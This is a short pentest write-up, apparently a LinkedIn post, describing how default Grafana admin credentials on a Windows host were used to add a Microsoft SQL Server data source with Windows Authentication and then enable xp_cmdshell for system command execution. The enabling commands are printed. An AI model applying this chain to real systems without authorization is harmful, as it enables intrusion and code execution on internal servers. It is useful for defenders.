Grafana Remote Command Execution Through Microsoft SQL Server
Vahagn Israelian????
I hack web apps & networks ? Expert in External Penetration Testing, Web Application Security, Vulnerability Assessment & Source Code Review ? Ethical Hacker ? Pentester ? SRT Member ? Bug Hunter
Few days ago I was conducting internal penetration testing for a mid-size company when I came across a Grafana(v10) instance with default admin credentials, running on tcp/3000 as usual.
While during Bug Bounty default credentials are the point where you should stop and report without going further, penetration testing gives you the freedom to dive deeper and exploit the finding.
After authorizing with default admin:admin credentials, I’ve started to google to see if there are any known ways to get code execution in Grafana with admin privileges.
Unfortunately, I was unable to find anything relevant to my case, so I started to look around.
It’s worth mentioning that Grafana was installed on Windows machine. After a quick nmap I found a few more interesting open ports.
First one was Prometheus, hanging on tcp/9090 and the second was Microsoft SQL Server on tcp/1433.
As you may know in Grafana you can add different data sources, including Elasticsearch, Gitlab, Jira and others.
Fortunately for me, Microsoft SQL Server was also among these available data sources. The only problem was that I had no credentials for SQL Server to connect to it.
But as I found out later you don’t really need username and password to connect to Microsoft SQL Server.
领英推荐
As long as your Grafana is installed on Windows and single sign-on is enabled for SQL Server, it can use a system user session to authenticate.
So I quickly added a new SQL Server Data source and filled in all the necessary data, including Host, Database name, and most importantly Authentication type was set to Windows Authentication.
I was successfully connected to SQL Server, and from that point, I was able to execute SQL queries.
The final step was the activation of the xp_cmdshell procedure to be able to execute system commands.
EXEC sp_configure ‘show advanced options’, ‘1’
RECONFIGURE
EXEC sp_configure ‘xp_cmdshell’, ‘1’
RECONFIGURE
Now we are good to go!
Thanks for reading! Don't forget to subscribe to my blog on medium.
I will leave the link in the comments ??
Database Administrator chez Mercuria Energy Trading S.A.
1 年With appropriate Security configuration on the database, it's impossible.
I hack web apps & networks ? Expert in External Penetration Testing, Web Application Security, Vulnerability Assessment & Source Code Review ? Ethical Hacker ? Pentester ? SRT Member ? Bug Hunter
1 年More articles to come soon ?? https://medium.com/@konqi